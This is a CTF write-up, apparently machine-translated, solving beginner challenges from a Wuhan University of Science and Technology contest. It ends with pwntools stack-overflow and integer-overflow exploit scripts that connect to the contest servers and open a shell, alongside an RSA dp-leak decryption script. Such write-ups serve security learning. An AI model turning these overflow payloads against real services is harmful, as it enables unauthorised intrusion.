In the past two days, I did a novice competition at Wuhan University of Science and Technology. Since I am Xiao Mengxin, I don’t know any difficult questions. Here are some simple questions.
Misc
1. Space Club
is like this after opening, combined with the topic, it is estimated that it may be a bunch of spaces or the like, use python to see
with open("space.txt")as f:
a=f.read()
for i in a:
print (str(ord(i)))
The running result is shown in the figure, 32 is the ASCII code of the space, and 10 is guessed to be used for separation. The different number of spaces between the separations is useful information, and then extract
with open("space.txt")as f:
a=f.read()
g=0
s=''
for i in a:
if ord(i)==32:
g=g+1
else:
s+=chr(g+97)
g=0
print (s)
Since I initially thought that the number of spaces would represent different letters, this is the result of the number of spaces + 97. I found that the number of spaces between the separators is either 6 or 12. From this, we can put g Replace as 0, m as 1, and then convert binary to ASCII to get flag
2.
The welcome file is like this. After the exe is opened, the camera will be turned on. Combining the three persons in the title and the prompts in the description, it is concluded that three people are required to appear in the camera to get the flag, and the picture will not be uploaded, so that Exposing my handsome face
3.
After the file is downloaded, there is no suffix. 010editor or winhex shows that the header file is a pdf file. Modify the suffix and open it with pdf editor or Photoshop. You can see that the prompt
flag is blocked by the picture, then we select Picture let it climb for the Lord! After crawling away, I saw the following
hexadecimal to ASCII to get the flag
4.
After downloading the girlfriend file, it is a wav audio. The sound is suspected to be dial tone steganography. I opened it with audio processing software and checked the spectrogram to verify that the guess was
realized by the method shown in the second picture. I tried the naked eye at first Look, I found out that there are too many, and my eyes are almost blind. The key is that it is easy to make mistakes. My mind burst directly. Then I suddenly remembered that there was a script. I went to github to make a script, changed the file name in the script, ran it, and waited for it
999 666 88 2 777 33 6 999 4 444 777 555 333 777 444 33 66 3 7777
I am happily Is it wrong to take this bunch of things to submit? When I think about it carefully, it doesn't look like a flag so long. I am indeed naive. Thinking about it again, it feels like it should be related to the nine-key keyboard. 999 represents the third character y above 9, and * is the separator. The solution is youaremygirlfriends. Obviously this must be a flag.
5.
The question of find me is a jpg picture. After downloading it, I saw such a bunch of things in the remarks.
I don’t know what it is. I didn’t know it until Baidu. It can be solved by
putting it on this website https://www.qqxiuzi .cn/bianma/wenbenjiami.php?s=mangwen
6.shop
here needs nc connection 47.97.40.187 12306
after connecting and found that you have 2020 money, cheaper flag costs 999 and there is no limit on the quantity, real flag can only buy one but
We can buy a certain amount of cheaper flags for 100,000 and use integer overflow to realize the dream of billionaires. The
number can be a little larger than 2’s 31 times/999+2020/999. With this money, you can buy real flags.
7.Alison likes jojo
after file download, this is the two pictures, the first look into the virtual machine binwalk, separable get an installation package is encrypted, you can blast a second password
compression bag is this A txt, decrypted three times with base64 to get "killerqueen", because there is a second picture and there are no other files in it, it is preliminarily guessed that the second picture was encrypted by some software, and killerqueen is the password. Encrypt the outguess and get the flag
Crypto
1. The
calculation of large numbers is enough for part3 calculator, part4 is ordinary definite integral, part2 I use python, and part1 I used a website to calculate.
2. B@se
This question is to make changes to the base64 table, just convert it back
3. The Buddha said: It can only be four days
. Anyone who is familiar with the password should know this encryption method, but what is a bit tricky is that he uses the new Buddha's saying here, and there are new ones?
http://hi.pcmoe.net/Buddha.html After
solving it is the socialist core values encryption.
According to the prompts, the fence password, remove _doyouknowfence and continue to decrypt. I
found this, for the same reason, continue to explain Caesar after removing the end, but it is solved After one lap, I didn’t find anything, so I guessed that the Caesar password was not the last one.
Then I observed and found that this string of characters consisted of capital letters and 2-7 numbers. Then I thought of base32. The beginning of the game flag is wctf2020. Take This is to encrypt a wave
starting
with'O ', and find the string of characters starting with O in Caesars decryption. The beginning is exactly the same, indicating that the guess is correct. Take this string of characters to base32 to decrypt to get the flag
4.leak
This is an rsa topic, the decryption script is as follows
import gmpy2
import binascii
def getd(n,e,dp):
for i in range(1,e):
if (dp*e-1)%i == 0:
if n%(((dp*e-1)/i)+1)==0:
p=((dp*e-1)/i)+1
q=n/(((dp*e-1)/i)+1)
phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)%phi
return d
e = 65537
n = 156808343598578774957375696815188980682166740609302831099696492068246337198792510898818496239166339015207305102101431634283168544492984586566799996471150252382144148257236707247267506165670877506370253127695314163987084076462560095456635833650720606337852199362362120808707925913897956527780930423574343287847
dp = 734763139918837027274765680404546851353356952885439663987181004382601658386317353877499122276686150509151221546249750373865024485652349719427182780275825
c = 108542078809057774666748066235473292495343753790443966020636060807418393737258696352569345621488958094856305865603100885838672591764072157183336139243588435583104423268921439473113244493821692560960443688048994557463526099985303667243623711454841573922233051289561865599722004107134302070301237345400354257869
d=getd(n,e,dp)
m=pow(c,d,n)
print binascii.unhexlify(hex(m)[2:])
Run flag
Re
1.Cr0ssFun
dragged into ida
is actually a doll. Finally, the ASCII code of each character of the flag is given, and the flag can be obtained by connecting it.
2.level1
This question is a simple encryption, understand the encryption method, and write the decryption script according to the given output.txt
3.
Find the flag in the string after level2 upx shelling
For
the question of 4.level3, I initially thought he was doing something in base64_encode. After analyzing for a long time, I found out that the base64 table was changed. After
getting the new base64 table, I could solve the base64 string given in the code. Get flag
Pwn
1.getshell
uses stack overflow, return address 0x08048524 to get flag
from pwn import *
sh=remote("47.97.40.187",12333)
payload='a'*0x18+'bbbb'+p32(0x08048524)
sh.sendline(payload)
sh.interactive()
2. getshell2
uses the stack overflow and returns the address 0x08048529 to call the system function, then find the address of the
sh string and pass the sh string as a parameter to the system function.
from pwn import *
sh=remote("47.97.40.187",12334)
payload='a'*0x18+'bbbb'+p32(0x08048529)+p32(0x08048670)
sh.sendline(payload)
sh.interactive()
3. number_game has been
tested, the number -2^31-1 is enough
from pwn import *
sh=remote("106.12.48.20",12336)
#payload=str(2147483648)
sh.sendline(str(-2147483649))
sh.interactive()